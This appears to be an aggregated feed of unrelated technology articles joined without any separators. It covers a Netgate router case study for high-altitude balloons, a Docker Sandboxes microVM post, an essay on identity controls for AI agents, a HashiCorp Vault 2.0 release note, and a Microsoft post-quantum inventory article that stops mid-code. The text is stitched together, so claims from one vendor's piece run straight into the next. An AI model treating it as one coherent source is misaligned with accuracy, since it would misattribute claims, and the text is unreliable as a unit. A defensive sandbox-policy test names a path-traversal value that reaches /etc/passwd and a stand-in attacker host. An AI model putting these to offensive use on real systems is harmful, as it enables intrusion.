At altitudes exceeding 100,000 feet, where temperatures plunge to -80°C and physical access is impossible for months at a time, traditional networking equipment simply fails. But for Aerostar, operating in these extreme conditions isn’t theoretical; it’s mission-critical.
Customer Overview: Aerospace innovators reaching the edge of space
Aerostar, a business unit of TCOM, is a South Dakota-based pioneer in high-altitude balloon and unmanned aerial system (UAS) operations. Aerostar’s platforms support NASA instrumentation testing, government communications relay, disaster response, and commercial applications like environmental monitoring. Their operations require robust, reliable network connectivity in extreme environmental conditions, often at altitudes exceeding 70,000 ft and temperatures below -80°C.
To support these unique missions, Aerostar selected the Netgate® 2100 router with pfSense Plus® for its small footprint, low power consumption, and proven resilience in extreme temperatures, enabling secure, reliable networking for stratospheric payloads.
“The combination of durability, low power, and open-source flexibility made the Netgate 2100 the perfect solution for our high-altitude missions. It’s not just a router, it’s the backbone of our stratospheric networking operations.” Aaron Wyant, Aerostar International LLC
Challenge: Networking where no network has gone before
Aerostar previously relied on Ubiquiti Edge Routers, but end-of-life hardware and growing demands for port density, lower power consumption, and environmental durability necessitated a new solution.
Extreme temperatures
Flights routinely encounter temperatures ranging from -40°C to -80°C, well beyond the capabilities of standard commercial routers.
Limited payload space
Routers must be compact and lightweight to fit within specialized balloon frames or UAS platforms.
High reliability
Networking hardware must remain operational for months with no maintenance, powering payloads via solar panels and batteries.
Complex connectivity
The systems require multiple Ethernet ports, VPN capabilities, and support for a variety of network protocols to handle telemetry, command-and-control (C2), and real-time data streaming.
“Each payload is fully self-contained, powered by solar energy during the day and battery reserves at night, operating for months in the stratosphere with no external power or physical access.”
Aaron Wyant, Aerostar International LLC
Solution: Local LAN, global reach, no matter how high you fly
Aerostar deployed Netgate 2100s running pfSense Plus software for high-altitude and remote networking.
Beneath each balloon sits a payload frame carrying critical instruments. On 90% of balloon flights, Aerostar deploys a router just as you would in any standard network. Recently, they’ve paired a Starlink Mini with the router, providing a WAN interface while all payload devices connect via a local LAN.
The 2100s were paired with industrial-rated switches as needed, creating a modular, mission-ready networking solution suitable for one-time-use balloon flights or longer-duration unmanned aerial missions.
Key features included:
Extreme temperature performance
The 2100 operated successfully in vacuum-chamber testing down to -80°C, well beyond typical commercial hardware specifications.
Low power consumption
At 4 watts, the 2100 reduced power requirements compared to previous hardware, a critical factor for solar- and battery-powered payloads.
Compact design
Its small size and lightweight design allowed it to be integrated into balloon payload frames without affecting flight dynamics.
Flexible connectivity
Four LAN ports enabled local networking for payload sensors and instruments, while WAN and VPN capabilities ensured secure communications.
Open-source flexibility
pfSense Plus enabled customization to meet specific telemetry and routing requirements unique to each flight mission.
Results & Benefits: Reliable connectivity at the edge of the stratosphere
With the Netgate 2100, Aerostar achieved:
Reliable networking in extreme environments
Routers maintained operation at stratospheric altitudes, in temperatures as low as -80°C, over a mission lasting almost a year.
Reduced payload power and weight
Lower power consumption and a compact form factor optimized balloon flight efficiency.
Scalable deployment
Modular design enables quick integration across diverse UAS and balloon platforms.
Enhanced mission capability
Secure, real-time telemetry and command-and-control for NASA instrumentation, government communications, disaster response, and commercial monitoring.
Future readiness
Support for the upcoming TAA certification ensures broader deployment potential across government and commercial missions.
Final Thought
Most networking solutions are designed for controlled environments.
This one wasn’t.
It was built to operate where:
There is no infrastructure
There is no maintenance
And failure isn’t an option
And that’s exactly why it works.
Want to see it in action?
Watch the full mission video and explore how networking is evolving beyond Earth.
About Aerostar
Aerostar represents the evolution of innovation in action, building on decades of lighter-than-air expertise to become a leader in high-altitude platforms and advanced manufacturing. Today, Aerostar leverages cutting-edge technology, such as the Netgate 2100 in stratospheric systems, to connect, protect, and support critical missions worldwide, from communications relay to life-saving applications, as it continues to push the boundaries of what’s possible at 70,000-plus feet.
Aerostar has taken lighter-than-air technologies to all new heights by leveraging the most brilliant minds, materials, and machinery for over 70 years to connect, protect, and save lives. Their platforms support NASA, government, and commercial applications worldwide, delivering innovative solutions for data collection, communications, and disaster response.
About Netgate
Netgate is proud to support a partner committed to making the world more connected and secure. Netgate develops pfSense software-based routers that deliver enterprise-grade networking, security, and flexibility across commercial, government, and remote applications. pfSense Plus software, the world’s leading firewall, router, and VPN solution, provides secure network edge and cloud networking solutions for millions of deployments worldwide.
About the Netgate 2100 with pfSense Plus
The Netgate 2100 is a compact yet powerful security gateway appliance that pairs purpose-built hardware with the pfSense Plus software platform, delivering enterprise-grade firewall, routing, and VPN capabilities in a small desktop form factor. It features a dual-core ARM Cortex‑A53 CPU, 4 GB DDR4 RAM, and flexible Ethernet connectivity (WAN RJ45/SFP combo plus four LAN ports).
The Netgate 2100 proves its versatility by powering high-altitude balloon payloads and connecting Starlink Mini WAN interfaces to onboard LAN networks, while withstanding extreme temperatures and altitudes. pfSense Plus offers advanced firewall filtering, VPNs, multi-WAN load balancing, IDS/IPS, and detailed traffic management, all managed via an intuitive web interface. With passive cooling, low power draw, and expansion options for additional storage, the Netgate 2100 is a small device capable of delivering reliable, scalable, and secure networking, even at the edge of the stratosphere.
Last week, we launched Docker Sandboxes with a bold goal: to deliver the strongest agent isolation in the market.
This post unpacks that claim, how microVMs enable it, and some of the architectural choices we made in this approach.
The Problem With Every Other Approach
Every sandboxing model asks you to give something up. We looked at the top four approaches.
Full VMs offer strong isolation, but general-purpose VMs weren’t designed for ephemeral, session-heavy agent workflows. Some VMs built for specific workloads can spin up more effectively on modern hardware, but the general-purpose VM experience (slow cold starts, heavy resource overhead) pushes developers toward skipping isolation entirely.
Containers are fast and are the way modern applications are built. But for an autonomous agent that needs to build and run its own Docker containers, which coding agents routinely do, you hit Docker-in-Docker, which requires elevated privileges that undermine the isolation you set up in the first place. Agents need a real Docker environment to do development work, and containers alone don’t give you that cleanly.
WASM / V8 isolates are fast to spin up, but the isolation model is fundamentally different. You’re running isolates, not operating systems. Even providers of isolate-based sandboxes have acknowledged that hardening V8 is difficult, and that security bugs in the V8 engine surface more frequently than in mature hypervisors. Beyond the security model, there’s a practical gap: your agent can’t install system packages or run arbitrary shell commands. For a coding agent that needs a real development environment, WASM isn’t one.
Not using any sandboxing is fast, obviously. It’s also a liability. One rm -rf, one leaked .env, one rogue network call, and the blast radius is your entire machine.
Why MicroVMs
Docker Sandboxes run each agent session inside a dedicated microVM with a private Docker daemon isolated by the VM boundary, and no path back to the host.
That one sentence contains three architectural decisions worth unpacking.
Dedicated microVM. Each sandbox gets its own kernel. It’s hardware-boundary isolation, the same kind you get from a full VM. A compromised or runaway agent can’t reach the host, other sandboxes, or anything outside its environment. If it tries to escape, it hits a wall.
Private, VM-isolated Docker daemon. This is the key differentiator for coding agents. AI is going to result in more container workloads, not fewer. Containers are how applications are developed, and agents need a Docker environment to do that development. Docker Sandboxes give each agent its own Docker daemon running inside a microVM, fully isolated by the VM boundary. Your agent gets full docker build, docker run, and docker compose support with no socket mounting, no host-level privileges, none of the security compromises other approaches require. This means we treat agents as we would a human developer, giving them a true developer environment so they can actually complete tasks across the SDLC.
No path back to the host. File access, network policies, and secrets are defined before the agent runs, not enforced by the agent itself. This is an important distinction. An LLM deciding its own security boundaries is not a security model. The bounding box has to come from infrastructure, not from a system prompt.
Why We Built a New VMM
Choosing microVMs was the easy part. Running them where developers actually work was the hard part.
We looked hard at existing options, but none of them were designed for what we needed. Firecracker, the most well-known microVM runtime, was designed for cloud infrastructure, specifically Linux/KVM environments like AWS Lambda. It has no native support for macOS or Windows, full stop. That’s fine for server-side workloads, but coding agents mostly don’t run in the cloud; they run on developer laptops, across macOS, Windows, and Linux.
We could have shimmed an existing VMM into working across platforms, creating translation layers on macOS and workarounds on Windows, but bolting cross-platform support onto a Linux-first VMM means fighting abstractions that were never designed for it. That’s how you end up with fragile, layered workarounds that break the “it just works” promise and create the friction that makes developers skip sandboxing altogether.
So we built a new VMM, purpose-built for where coding agents actually run.
It runs natively on all three platforms using each OS’s native hypervisor: Apple’s Hypervisor.framework, Windows Hypervisor Platform, and Linux KVM. A single codebase for three platforms and zero translation layers.
This matters because it means agents get kernel-level isolation optimized for each specific OS. Cold starts are fast because there’s no abstraction tax. A developer on a MacBook gets the same isolation guarantees and startup performance as a developer on a Linux workstation or a Windows machine.
Building a VMM from scratch is not a small undertaking. But the alternative, asking developers to accept slower starts, degraded compatibility, or platform-specific caveats, is exactly the kind of asterisk that makes people run agents on the host instead. Our approach removes that asterisk at the hypervisor level.
Fast Cold Starts
We rebuilt the virtualization layer from scratch, optimizing for fast spin-up and tear-down. Cold starts are fast. This matters for one reason: if the sandbox is slow, developers skip it. Every friction point between “start agent” and “agent is running” is a reason to run on the host instead. With near-instant starts, there is no performance reason to run outside it.
What This Means In Practice
Here’s the concrete version of what this architecture gives you:
Full development environment. Agents can clone repos, install dependencies, run test suites, build Docker images, spin up multi-container services, and open pull requests, all inside the sandbox. Nothing is stubbed out or simulated. Agents are treated as developers and given what they need to complete tasks end to end.
Scoped access, not all-or-nothing. You define the boundary: exactly which files and directories the agent can see, which network endpoints it can reach, and which secrets it receives. Credentials are injected at runtime from outside the microVM boundary, never baked into the environment.
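As an illustration of that principle, here is a minimal Python sketch of a pre-declared boundary. The names (`SandboxPolicy`, `can_read`, `can_connect`) are hypothetical, not Docker's actual API; the point is that the allowlists exist before the agent runs, and every operation is checked against them rather than against anything the agent decides.

```python
from pathlib import Path
from urllib.parse import urlparse

class SandboxPolicy:
    """Boundary fixed by infrastructure before the agent starts (illustrative only)."""

    def __init__(self, allowed_dirs, allowed_hosts):
        self.allowed_dirs = [Path(d).resolve() for d in allowed_dirs]
        self.allowed_hosts = set(allowed_hosts)

    def can_read(self, path: str) -> bool:
        # Resolve symlinks and ".." first so path tricks can't escape the boundary.
        p = Path(path).resolve()
        return any(p.is_relative_to(d) for d in self.allowed_dirs)

    def can_connect(self, url: str) -> bool:
        return urlparse(url).hostname in self.allowed_hosts

policy = SandboxPolicy(
    allowed_dirs=["/workspace/repo"],
    allowed_hosts=["api.github.com"],
)

assert policy.can_read("/workspace/repo/src/main.py")           # inside the boundary
assert not policy.can_read("/workspace/repo/../../etc/passwd")  # traversal denied
assert policy.can_connect("https://api.github.com/repos")
assert not policy.can_connect("https://evil.example.com/x")
```

In Docker Sandboxes the equivalent enforcement happens at the microVM and network layer rather than in application code, which is what keeps it out of the agent's reach.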
Disposable by design. If an agent goes off track, delete the sandbox and start fresh in seconds. There is no state to clean up and nothing to roll back on your host.
Works with every major agent. Claude Code, Codex, OpenCode, GitHub Copilot, Gemini CLI, Kiro, Docker Agent, and next-generation autonomous systems like OpenClaw and NanoClaw. Same isolation, same speed, one sandbox model across all of them.
For Teams
Individual developers can install and run Docker Sandboxes today, standalone, no Docker Desktop license required.
For teams that want centralized filesystem and network policies that can be enforced across an organization and scale sandboxed execution, get in touch to learn about enterprise deployment.
The Tradeoff That Isn’t
The pitch for sandboxing has always come with an asterisk: yes, it’s safer, but you’ll pay for it in speed, compatibility, or workflow friction.
MicroVMs eliminate that asterisk. You get VM-grade isolation with cold starts fast enough that there’s no reason to skip it, and full Docker support inside the sandbox. There is no tradeoff.
Your agents should be running autonomously. They just shouldn’t be running without any guardrails.
Most security models were built around a simple idea: people log in, systems respond, and access is reviewed over time. That idea held up through the shift to cloud and automation. It still mostly works for services and pipelines.
Agentic AI changes that balance, and the gap it creates isn't theoretical. It's operational, compounding, and increasingly easy to miss until something breaks.
How access gets away from you
Here's a scenario that's already playing out across enterprise environments. A user delegates a task to an AI cowork agent — say, pulling data from a CRM, cross-referencing a financial system, and generating a report. The agent assumes the user's identity, completes the task, and everything looks fine.
Except the access path it opened doesn't close cleanly. The role it assumed stays warm. The credential it used gets cached. Three months later, during an incident review, someone asks: which agent did that? Under whose authority? What else did it touch? Nobody can answer with confidence, because at the time, the access looked like a user doing their job.
That's the shape of the problem. Not a dramatic breach, a quiet accumulation of access that nobody explicitly approved, and nobody thought to revoke.
The identity model we built doesn't fit the world we're entering
Traditional identity and access management was built around people. Even when we expanded it to applications and services, the underlying assumptions stayed largely intact: identities were provisioned deliberately; permissions were reviewed periodically, and access decisions were made ahead of time.
Agents don't fit that shape. They request access dynamically. They call new tools. They assume roles. In some cases, they generate credentials to complete a task. Over time, those interactions can create access paths no one explicitly approved, reviewed, or even anticipated, leading to privilege that grows not in one obvious jump, but in small steps that are easy to miss individually and hard to see in aggregate.
This isn't just another form of complexity. It's a fundamentally new kind of identity control gap, and it has two distinct flavors.
The first is delegated access, where agents act on behalf of a human, inheriting that user's identity to carry out a task. Copilots and coding assistants work this way. The agent does things the user could do, but the user isn't watching every step. The second is autonomous access, where agents operate with their own identity, authenticating independently and taking action outside the scope of any individual user's authority. Infrastructure agents and workflow orchestrators work this way. Both models are legitimate. Both create real governance challenges. And in most environments today, the controls for each are being built separately, inconsistently, or not at all.
A new attack surface
When agents inherit a user's identity, their actions are indistinguishable from a human's. When something goes wrong, there's no clean way to separate intent from execution or what a person approved versus what an agent decided on its own. When agents operate autonomously, they carry their own credentials, which means every agent is a potential target, a potential source of sprawl, and a potential audit gap.
Either way, machine identities already outnumber human ones in most enterprises. Agents accelerate that imbalance. Every workflow needs credentials. Every tool call needs access. When teams are under pressure to move fast, those credentials tend to stick around longer than they should — long-lived, overly permissive, and sometimes shared — because managing uniqueness at scale feels like overhead no one has time for right now.
That's how secrets end up in code, roles accumulate privileges, and access quietly spreads.
Why Day 1 isn't the hard part
Most organizations don't fail at securing the initial deployment. They define roles, plug in existing IAM, and move forward. The failure happens later.
Secrets rotate late, or not at all. Certificates expire unexpectedly. IAM roles quietly accumulate permissions. Remediation happens once, then drifts. And agents make this worse in a specific way. An autonomous system that can modify infrastructure and trigger workflows doesn't just inherit existing gaps, it can reintroduce vulnerabilities that were previously fixed, undoing security work between review cycles without anyone noticing.
When incidents happen, the lack of clear attribution becomes the real problem. Teams struggle to answer basic questions like who authorized this action, which agent executed it, what credentials were used, what changed, and when? For regulated industries, that uncertainty isn't just inconvenient; it can stop an audit in its tracks.
Static controls in a moving system
Most security controls still assume access is something you grant in advance. Once authenticated, a system trusts that identity until something changes.
Agents don't respect that boundary. A delegated agent might legitimately access a system in one moment and, two steps later in its reasoning chain, try to reach something its user never intended to authorize. An autonomous agent might operate across three cloud environments in the span of a single workflow. Context shifts constantly. What was appropriate five minutes ago may not be appropriate now.
This is where existing tools run into their limits. IAM platforms focus on who you are. PAM was built around how humans access systems. Secrets management focuses on storing credentials. None of these were designed for an identity that changes context at machine speed, across environments, with no natural pauses.
Trust can't be a one-time decision in these environments. Identity needs to be verified continuously, not just at login. Access needs to be scoped to the task at hand, not the lifecycle of the agent. Credentials should expire naturally, tied to specific context and purpose, without relying on cleanup processes that run quarterly. And authorization decisions have to happen at the point of action, not when something is provisioned.
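Those requirements can be sketched in a few lines. This is an illustrative model, not any vendor's API: a broker issues a credential scoped to one task with a short TTL, and authorization is evaluated at the moment of action, so expiry requires no quarterly cleanup job.

```python
import secrets
import time

class CredentialBroker:
    """Illustrative broker: task-scoped, self-expiring grants (hypothetical API)."""

    def __init__(self):
        self._grants = {}

    def issue(self, agent_id: str, scope: set, ttl_seconds: float) -> str:
        token = secrets.token_urlsafe(16)
        self._grants[token] = {
            "agent": agent_id,
            "scope": scope,
            "expires": time.time() + ttl_seconds,
        }
        return token

    def authorize(self, token: str, action: str) -> bool:
        # The decision happens at the point of action, not at provisioning time.
        grant = self._grants.get(token)
        if grant is None or time.time() >= grant["expires"]:
            return False  # unknown or expired: denied, no cleanup process needed
        return action in grant["scope"]

broker = CredentialBroker()
token = broker.issue("report-agent", scope={"crm:read"}, ttl_seconds=300)
assert broker.authorize(token, "crm:read")        # in scope, within TTL
assert not broker.authorize(token, "crm:write")   # out of scope: denied
expired = broker.issue("report-agent", scope={"crm:read"}, ttl_seconds=-1)
assert not broker.authorize(expired, "crm:read")  # already expired: denied
```

Real systems add attribution (which identity, on whose behalf, under what scope) to every `authorize` decision so the audit trail exists by construction.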
Extending zero trust to non-human identities
For teams already working toward zero trust, agentic AI exposes the next gap to close, and it's the gap where existing controls are most likely to fail.
The principles still apply: least privilege, continuous verification, strong identity at the center. What changes is the surface and the speed. Zero trust as most organizations have implemented it was designed for humans authenticating to systems. It assumed a person would log in, establish a session, and do work within that session. Agents don't work in sessions. They work in actions, thousands of them, across environments, triggered by other agents, chained into workflows that no human is watching in real time.
Extending zero trust to agents means every agent has its own verifiable identity, not a shared key or borrowed role. It means access is temporary by default, and when a task ends, permissions should too. It means credentials are short-lived and issued just-in-time, not stored and rotated on a schedule. And it means actions are observable not just as events, but as attributable decisions: which identity authorized this, under what scope, on whose behalf.
That's not a theoretical posture. It's a concrete set of controls that already exist for human-centric workflows like dynamic secrets, certificate-based identity, policy-enforced access, and comprehensive audit logging. The engineering challenge is extending them to cover agents at the scale and speed they operate.
Moving forward without losing control
Agentic AI isn't experimental anymore. Teams are adopting it because it works, and the pressure to move fast is real.
The challenge is that speed creates the conditions for the scenario described at the start of this piece: access that accumulates quietly, through behavior rather than design, until the audit question comes and nobody has a clean answer. That's not a failure of tooling so much as a failure of assumptions. Security models that were built for a world where access was provisioned deliberately and reviewed periodically are now applied to systems that provision dynamically and never stop.
The organizations that will handle this well aren't the ones that slow down adoption. They're the ones that connect identity, access, and execution into a coherent picture where every agent has a clear identity, every action is attributable, and the controls are enforced at the moment work happens, not the moment it's reviewed.
That's how autonomy becomes something you can actually rely on. Not because you're watching everything, but because the system itself knows what it should and shouldn't do, and leaves a clear record either way.
Vault Enterprise 2.0 is now generally available, delivering new capabilities to help organizations secure, scale, and simplify secrets management across modern infrastructure. This release strengthens identity-based access, improves credential lifecycle automation, and enables high-performance encryption for emerging workloads, while continuing to enhance usability and integrations across the ecosystem.
Key features in Vault Enterprise 2.0 include:
Secret distribution with workload identity federation to eliminate reliance on long-lived static credentials and improve security across hybrid and multi-cloud environments
Expanded credential rotation capabilities for Linux to reduce operational risk and enforce short-lived access
Envelope encryption for streaming and large-scale workloads to enable high-performance data protection without sacrificing centralized control
Enhanced integrations with Terraform, Kubernetes, and public certificate authorities to streamline infrastructure and application workflows
Improved user experience with a redesigned UI and guided onboarding to accelerate time to value and simplify Vault adoption
Adoption of a new versioning pattern and support model
HashiCorp Vault is transitioning to a new release and support model aligned with IBM versioning and lifecycle practices, which is why the product is moving directly from version 1.21 to 2.0.0. The jump does not signal the kind of architectural change a major version bump would normally represent; rather, it marks a move away from HashiCorp’s previous long-term support approach toward the IBM Support Cycle-2 policy, which is designed to provide clearer lifecycle expectations. Under this model, each major (“V”) milestone release will receive at least two years of standard support, with extended support options available to ensure continuity for mission-critical workloads. Extended support includes an initial third year with critical bug fixes, usage support, and select security updates, followed by ongoing support (years four through six) for usage guidance and known-issue assistance. This approach delivers a more predictable and durable support framework while aligning Vault with the broader IBM product lifecycle strategy. For more detail on IBM versioning and support patterns, see: IBM Software product versioning explained and IBM Software Support Lifecycle Policies.
Vault Enterprise leads in securing human and non-human identities
Identity management with Vault continues to evolve with new capabilities that support centralized policy management, reduce risks from long-lived secrets with improved rotation, and enforce traceability for increased auditability and transparency.
Smarter rotation and simplified role management
Local account password rotation for RHEL, Ubuntu, and additional Linux distributions is now generally available. With this capability, engineers and platform teams that use Vault can set secret management policies that reduce credential complexity, define rotation and lease time periods, and set other criteria that limit a breach’s blast radius and impact, all at the policy level.
Systems administrators now have central control of user account credentials on local Linux systems. Previously, they would have a gap in control, as local root users might use a common password shared across systems. Now, with password management in Vault, access to these systems can be controlled and audited, and overall risk is limited by unique time-bound passwords for each system.
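The “unique, time-bound password per system” idea can be made concrete with a short sketch. This is illustrative only and does not reflect Vault’s implementation; it simply shows why per-host randomness plus an expiry removes the shared-root-password failure mode.

```python
import secrets
import string
import time

ALPHABET = string.ascii_letters + string.digits + "!@#%^*-_"

def issue_local_password(hostname: str, ttl_seconds: int) -> dict:
    # One random credential per host, tagged with an expiry so rotation can be
    # enforced centrally instead of relying on a password shared across systems.
    password = "".join(secrets.choice(ALPHABET) for _ in range(24))
    return {
        "host": hostname,
        "password": password,
        "expires_at": time.time() + ttl_seconds,
    }

fleet = [issue_local_password(h, ttl_seconds=86400) for h in ("web-01", "web-02", "db-01")]
# Compromising one host's password reveals nothing about any other host's.
assert len({c["password"] for c in fleet}) == len(fleet)
```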
In addition, systems administrators who need to manage thousands of machines across various data centers can rely on automation to update local account passwords without manually logging in to each system they manage. Automating this critical security task improves the overall posture by reducing the risk of manual errors and adding auditability for compliance reporting, which matters more as the number of managed machines continues to grow.
Vault operators will now benefit from seamless Vault onboarding that will not require maintenance windows. Each account will now be able to rotate its own credentials, and Vault operators will have fine-grained control over automatic rotation of LDAP account passwords. This reduces the burden of managing privileged accounts and decreases the blast radius of credential exposure for static roles.
Secure streaming workloads on the edge with in-place encryption
Vault Enterprise 2.0 also introduces envelope encryption with the Transit secrets engine, enhancing support for encrypting large artifacts and streaming workloads. Rather than sending full payloads to Vault, applications can now encrypt data locally using ephemeral key encryption keys (KEKs), while Vault continues to manage and protect those keys through centralized policy and access controls. This approach preserves Vault as the root of trust while significantly improving performance, scalability, and efficiency for high-throughput and large-scale data processing use cases.
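The envelope pattern behind this can be sketched in a few lines of Python. The XOR keystream below is a toy stand-in for a real cipher such as AES-GCM, and the `kek` variable stands in for a key that Vault’s Transit engine would hold and never release; the point is that only the small data key, never the bulk payload, crosses to the key manager.

```python
import hashlib
import os

def keystream(key: bytes, n: int) -> bytes:
    # Toy counter-mode keystream, for illustration only.
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:n]

def xor_cipher(data: bytes, key: bytes) -> bytes:
    # XOR with the keystream; applying it twice with the same key decrypts.
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

# 1. The application generates an ephemeral data key locally.
data_key = os.urandom(32)
# 2. The large payload is encrypted locally and never sent to the key manager.
payload = b"many gigabytes of streaming data..."
ciphertext = xor_cipher(payload, data_key)
# 3. Only the small data key is wrapped by the central root of trust
#    (a stand-in for Vault Transit, which would keep kek inside Vault).
kek = os.urandom(32)
wrapped_key = xor_cipher(data_key, kek)
# Decryption: unwrap the data key centrally, then decrypt the payload locally.
assert xor_cipher(ciphertext, xor_cipher(wrapped_key, kek)) == payload
```

Because only 32-byte keys travel to the key manager, throughput scales with local compute rather than with the central service, which is the property the release highlights for streaming workloads.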
These capabilities are already being applied in real-world scenarios, such as with ariso.ai, where Vault serves as the centralized key management layer while encryption occurs at the edge across distributed AI pipelines. This allows organizations to scale encryption alongside data-intensive workloads without introducing bottlenecks, while still enforcing strong governance and security policies. As part of this release, envelope encryption positions Vault to better support modern AI and streaming architectures by combining centralized control with distributed execution.
Scale secret distribution with identity-first access and secret sync
Organizations managing secrets across hybrid and multi-cloud environments often rely on long-lived static credentials, such as IAM access keys, service principals, or service account keys, to enable integrations like secret synchronization. While functional, this model creates significant security and operational challenges: increased blast radius if credentials are leaked, manual rotation overhead, risk of silent failures due to expiration, and widespread credential sprawl across systems and teams. These issues are increasingly at odds with modern security mandates that prioritize short-lived, identity-based access and zero trust principles.
Vault Enterprise 2.0 addresses these challenges by introducing workload identity federation to secret sync, replacing static credentials with short-lived, dynamically exchanged tokens based on trusted identity. This approach eliminates the need to store or rotate credentials, reduces risk exposure, and aligns secret distribution with cloud-native authentication models across AWS, Azure, and GCP. The result is stronger security, improved reliability, and simplified operations, enabling organizations to securely scale secret management, support non-human and agentic workloads, and maintain compliance without adding operational burden.
Secure workload identity with the SPIFFE secrets engine
A new SPIFFE secrets engine is generally available with Vault Enterprise 2.0. Organizations whose workloads rely on SPIFFE can now use tokens issued directly by Vault. With this release, JWT SVID identity tokens can now be requested after successful authentication with Vault. Reinforcing short-lived JWT SVIDs with automatically rotated identities reduces risks associated with long-lived tokens and missed rotations due to manual processes, and decreases blast radius in the event of a token leak.
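To show what consuming one of these tokens looks like, here is a standard-library sketch. The token is hand-built for illustration and its signature is a placeholder; a real validator verifies the signature against the SPIFFE trust bundle before trusting any claims.

```python
import base64
import json
import time

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Hand-built demo JWT-SVID: header.payload.signature (signature faked here).
claims = {
    "sub": "spiffe://example.org/billing/api",  # the workload's SPIFFE ID
    "aud": ["payments"],
    "exp": int(time.time()) + 300,              # short-lived by design
}
token = ".".join([
    b64url(b'{"alg":"ES256","typ":"JWT"}'),
    b64url(json.dumps(claims).encode()),
    "signature-placeholder",
])

def validate(token: str, audience: str) -> str:
    # Signature verification against the trust bundle is omitted in this sketch.
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    c = json.loads(base64.urlsafe_b64decode(payload))
    assert c["sub"].startswith("spiffe://"), "not a SPIFFE ID"
    assert audience in c["aud"], "audience mismatch"
    assert time.time() < c["exp"], "SVID expired"
    return c["sub"]

assert validate(token, "payments") == "spiffe://example.org/billing/api"
```

The short `exp` is what makes a leaked token low-value: by the time it is exfiltrated and replayed, it has often already expired.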
As Vault continues to set the pace in non-human identity management, capabilities that support fine-grained workload access control strengthen organizations’ capacity to secure ephemeral workloads. The SPIFFE secrets engine simplifies operations across heterogeneous environments and strengthens identity guarantees for non-human workloads. Secure, short-lived, verifiable workload identities make zero trust principles practical at scale, especially in cloud-native environments, and lighter-weight, more portable identities integrate more smoothly into these modern systems.
Vault continues to reinforce optimized security operations
Unified, automated approach to public and private certificates
Customers can now request and manage public PKI certificates through Vault, which will track and manage the request to a public CA. This capability provides increased support for teams that need to deliver services secured with publicly trusted certificates while continuing to move at the speed of development. Platform teams can now take advantage of an integrated workflow within Vault to manage both privately and publicly issued certificates for increased operational efficiency.
Reduced operations costs with SCIM integrations
Currently in public beta, SCIM server support lets users connect Vault with any SCIM-compliant identity provider. SCIM clients such as SailPoint and Okta integrate more cleanly for improved group and user lifecycle management. SCIM integration gives Vault operators more flexibility by reducing the manual effort of syncing users, groups, and group memberships to Vault, and deprovisioning via policy rather than manual process mitigates the risks of persistent user credentials. Teams working toward more consistent, centralized governance can rely on this beta capability in Vault 2.0.
Expanding support for Terraform ephemeral resources
Bridging secure lifecycle management with infrastructure lifecycle management, improvements to the Terraform Vault provider enhance Vault infrastructure as code and secure secret consumption. With these improvements, managing Vault (e.g., auth methods, secrets engines, and policies) via Terraform further ensures consistency, repeatability, and auditability of secrets management for infrastructure and the applications that depend on it. Teams gain further efficiencies across the infrastructure with Vault-backed secret retrieval during provisioning, without hardcoding and with automated credential rotation.
Enhancing the Vault UI for discoverability and usability
Vault Enterprise 2.0 introduces an enhanced UI with a guided onboarding experience that helps teams configure foundational features quickly and correctly. New and returning users are directed toward recommended Vault usage faster, with a curated startup path that accelerates time to value.
The onboarding wizard is now generally available and is designed to evolve beyond initial setup, with additional wizards planned to make Vault guidance an ongoing experience rather than a one-time task.
Contextual and embedded enhancements have also been introduced to support better feature discoverability. The support and documentation that previously lived only in Vault developer documents are now being delivered in-product, so users don’t need to leave Vault to learn how to use Vault.
Adoption can be accelerated when teams get the right help. The visual policy generator is also generally available and helps teams create secure policies without writing JSON or HCL from scratch. This reduces the learning curve for new users and administrators and improves efficiencies with consistent and recommended policy patterns across teams that use Vault.
Vault Enterprise 2.0 upgrade details
Vault Enterprise 2.0 delivers meaningful advancements in identity lifecycle automation, workload interoperability, usability, onboarding, and operational transparency. These improvements lower barriers to adoption while strengthening Vault’s core mission: secure, reliable, consistent secrets and identity management at enterprise scale.
You can explore the full list of updates, including those that are available in Community Edition, by reviewing the Vault 2.0 changelog.
As with previous releases, we recommend testing new releases in staging or isolated environments before deploying them to production. If you encounter any issues, please report them via the Vault GitHub issue tracker or start a discussion in the Vault community forum. If you believe you have discovered a security vulnerability, please report it responsibly by emailing security@hashicorp.com. Avoid using public channels for security issues. For details, refer to our security policy and PGP key.
To learn more about HCP Vault or Vault Enterprise, visit the Vault product page.
from HashiCorp Blog https://ift.tt/S7gxU81
Post-quantum cryptography (PQC) is coming—and for most organizations, the hardest part won’t be choosing new algorithms. It will be finding where cryptography is used today across applications, infrastructure, devices, and services so teams can plan, prioritize, and modernize with confidence. At Microsoft, we view this as the practical foundation of quantum readiness: you can’t protect or migrate what you can’t see.
As described in our Quantum Safe Program strategy, cryptography is embedded in all modern IT environments across every industry: in applications, network protocols, cloud services, and hardware devices. It also evolves constantly to ensure the best protection from newly discovered vulnerabilities, evolving standards from bodies like NIST and IETF, and emerging regulatory requirements. However, many organizations face a widespread challenge: without a comprehensive inventory and effective lifecycle process, they lack the visibility and agility needed to keep their infrastructure secure and up to date. As a result, when new vulnerabilities or mandates emerge, teams often struggle to quickly identify affected assets, determine ownership, and prioritize remediation efforts. This underscores the importance of establishing clear, ongoing inventory practices as a foundation for resilient management across the enterprise.
The first and most critical step toward a quantum-safe future—and sound cryptographic hygiene in general—is building a comprehensive cryptographic inventory. PQC adoption (like any cryptographic transition) is ultimately an engineering and operations exercise: you are updating cryptography across real systems with real dependencies, and you need visibility to do it safely.
In this post, we will define what a cryptographic inventory is, outline a practical customer-led operating model for managing cryptographic posture, and show how customers can start quickly using Microsoft Security capabilities and our partners.
A cryptographic inventory is a living catalog of all the cryptographic assets and mechanisms in use across your organization. This includes the following examples:
Category | Examples/Details
Certificates and keys | X.509 certificates, private/public key pairs, certificate authorities, key management systems
Protocols and cipher suites | TLS/SSL versions and configurations, SSH protocols, IPsec implementations
Cryptographic libraries | OpenSSL, LibCrypt, SymCrypt, other libraries embedded in applications
Network sessions | Active network sessions using encryption, protocol handshake details
Secrets and credentials | API keys, connection strings, service principal credentials stored in code, configuration files, or vaults
Hardware security modules (HSMs) | Physical and virtual HSMs, Trusted Platform Modules (TPMs)
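As a sketch of what one normalized entry in such a living catalog might look like, the Python dataclass below models a single cryptographic asset with the categories from the table above. The schema, field names, and sample entries are illustrative assumptions, not a standard format.

```python
from dataclasses import dataclass
from typing import Optional

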